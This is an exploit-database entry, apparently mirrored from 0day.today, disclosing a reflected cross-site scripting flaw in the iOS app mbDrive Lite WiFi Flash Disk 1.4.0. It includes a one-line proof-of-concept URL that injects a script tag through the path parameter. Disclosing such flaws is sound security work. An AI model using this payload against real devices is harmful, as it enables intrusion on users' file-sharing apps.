id: 37951
date: 09/09/2022
title: mbDrive Lite WiFi Flash Disk 1.4.0 Cross Site Scripting Vulnerability
author: Chokri Hammedi
cves: 

# Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS
# Exploit Author: Chokri Hammedi
# Vendor Homepage:
https://apps.apple.com/us/developer/haw-yuan-yang/id291212805
# Software Link:
https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033
# Version: 1.4.0
# Tested on: iPhone ios 15.6


poc:

http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E

#  0day.today [2023-03-27]  #